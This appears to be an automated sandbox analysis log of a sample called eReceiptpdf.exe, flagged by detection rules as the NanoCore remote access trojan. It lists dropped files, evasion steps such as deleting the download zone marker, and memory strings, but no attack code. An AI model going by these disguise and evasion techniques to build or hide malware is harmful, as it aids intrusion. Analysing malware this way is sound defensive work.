Source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =

Source: C:\Users\user\Desktop\eReceiptpdf.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176

Source: C:\Users\user\Desktop\eReceiptpdf.exe	Code function: 0_2_0166A038	0_2_0166A038
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Code function: 0_2_016613C6	0_2_016613C6
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Code function: 0_2_016694E4	0_2_016694E4
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Code function: 0_2_01663650	0_2_01663650
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Code function: 0_2_01660659	0_2_01660659
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Code function: 0_2_01660F18	0_2_01660F18
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Code function: 0_2_01668EF6	0_2_01668EF6
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Code function: 0_2_01660F09	0_2_01660F09
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_02DE13C6	12_2_02DE13C6
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_02DEA038	12_2_02DEA038
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_02DE36D8	12_2_02DE36D8
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_02DE0659	12_2_02DE0659
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_02DE94D7	12_2_02DE94D7
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_02DE8EF3	12_2_02DE8EF3
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_02DE3E50	12_2_02DE3E50
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_02DE0F18	12_2_02DE0F18
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_02DEC00A	12_2_02DEC00A
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_02DEB9FA	12_2_02DEB9FA
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_02DE0F09	12_2_02DE0F09
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 18_2_0306E471	18_2_0306E471
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 18_2_0306E480	18_2_0306E480
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 18_2_0306BBD4	18_2_0306BBD4

Source: eReceiptpdf.exe, 00000000.00000000.307229515.0000000002F60000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameAlienRunPE.exe6 vs eReceiptpdf.exe
Source: eReceiptpdf.exe, 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameWPhv JLl.exe2 vs eReceiptpdf.exe
Source: eReceiptpdf.exe, 00000000.00000000.295140150.0000000000DC2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameUltimate.dll2 vs eReceiptpdf.exe
Source: eReceiptpdf.exe, 00000000.00000000.295168078.0000000000DEE000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePayroll Management System.exeT vs eReceiptpdf.exe
Source: eReceiptpdf.exe, 00000005.00000000.290366463.000000000083E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePayroll Management System.exeT vs eReceiptpdf.exe
Source: eReceiptpdf.exe, 00000005.00000000.290341595.0000000000812000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameUltimate.dll2 vs eReceiptpdf.exe
Source: eReceiptpdf.exe	Binary or memory string: OriginalFilenameUltimate.dll2 vs eReceiptpdf.exe
Source: eReceiptpdf.exe	Binary or memory string: OriginalFilenamePayroll Management System.exeT vs eReceiptpdf.exe

Source: eReceiptpdf.exe

Static PE information: invalid certificate

Source: C:\Users\user\Desktop\eReceiptpdf.exe

File read: C:\Users\user\Desktop\eReceiptpdf.exe

Jump to behavior

Source: eReceiptpdf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\eReceiptpdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\eReceiptpdf.exe 'C:\Users\user\Desktop\eReceiptpdf.exe'
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process created: C:\Users\user\Desktop\eReceiptpdf.exe C:\Users\user\Desktop\eReceiptpdf.exe
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process created: C:\Users\user\Desktop\eReceiptpdf.exe C:\Users\user\Desktop\eReceiptpdf.exe	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe

File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER6061.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@14/13@19/4

Source: eReceiptpdf.exe, 00000000.00000000.295140150.0000000000DC2000.00000002.00020000.sdmp, eReceiptpdf.exe, 00000005.00000000.290341595.0000000000812000.00000002.00020000.sdmp, dhcpmon.exe, 0000000C.00000002.333769964.0000000000B32000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.330482629.0000000000422000.00000002.00020000.sdmp, dhcpmon.exe, 00000011.00000000.331107108.0000000000342000.00000002.00020000.sdmp, dhcpmon.exe, 00000012.00000000.332045500.0000000000D42000.00000002.00020000.sdmp	Binary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
Source: eReceiptpdf.exe, 00000000.00000000.295140150.0000000000DC2000.00000002.00020000.sdmp, eReceiptpdf.exe, 00000005.00000000.290341595.0000000000812000.00000002.00020000.sdmp, dhcpmon.exe, 0000000C.00000002.333769964.0000000000B32000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.330482629.0000000000422000.00000002.00020000.sdmp, dhcpmon.exe, 00000011.00000000.331107108.0000000000342000.00000002.00020000.sdmp, dhcpmon.exe, 00000012.00000000.332045500.0000000000D42000.00000002.00020000.sdmp	Binary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));

Source: C:\Users\user\Desktop\eReceiptpdf.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: eReceiptpdf.exe

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7124
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{d49cd953-2518-4f4a-81ab-2e5bbd26887f}

Source: C:\Users\user\Desktop\eReceiptpdf.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: eReceiptpdf.exe, 00000000.00000000.304724116.0000000007830000.00000004.00000001.sdmp

Binary or memory string: C:\Users\user\Desktop\eReceiptpdf.exeisualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbE3931}\Servererver32)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUT

Source: C:\Users\user\Desktop\eReceiptpdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: eReceiptpdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: eReceiptpdf.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbI/ source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: System.Core.ni.pdbRSDSD source: WER6061.tmp.dmp.11.dr
Source:	Binary string: System.Xml.ni.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: System.pdbMZ@ source: WER6061.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER6061.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: 1}\Servererver32dows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb(1 source: eReceiptpdf.exe, 00000000.00000000.326221264.0000000007830000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER6061.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Users\user\Desktop\eReceiptpdf.PDB source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: System.Configuration.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdble}i source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: .pdb& source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.326221264.0000000007830000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: System.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: System.Core.ni.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: jLC:\Windows\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: C:\Users\user\Desktop\eReceiptpdf.exeisualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbE3931}\Servererver32)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUT source: eReceiptpdf.exe, 00000000.00000000.304724116.0000000007830000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: mscorlib.ni.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: dhcpmon.exe, 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: System.Configuration.ni.pdbRSDSO* source: WER6061.tmp.dmp.11.dr
Source:	Binary string: C:\Users\user\Desktop\eReceiptpdf.PDB source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS source: WER6061.tmp.dmp.11.dr
Source:	Binary string: jVisualBasic.pdb< source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
Source:	Binary string: eReceiptpdf.PDB source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
Source:	Binary string: System.ni.pdb source: WER6061.tmp.dmp.11.dr

Source: C:\Users\user\Desktop\eReceiptpdf.exe	Code function: 0_2_00DCDF6C push ss; retn 0000h	0_2_00DCDF6D
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_00B3DF6C push ss; retn 0000h	12_2_00B3DF6D
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_02DEAE48 push eax; mov dword ptr [esp], ecx	12_2_02DEAF59
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_02DEAF1B push eax; mov dword ptr [esp], ecx	12_2_02DEAF59
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 15_2_0042DF6C push ss; retn 0000h	15_2_0042DF6D
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 17_2_0034DF6C push ss; retn 0000h	17_2_0034DF6D
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 18_2_00D4DF6C push ss; retn 0000h	18_2_00D4DF6D

Source: C:\Users\user\Desktop\eReceiptpdf.exe

File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\eReceiptpdf.exe

File opened: C:\Users\user\Desktop\eReceiptpdf.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
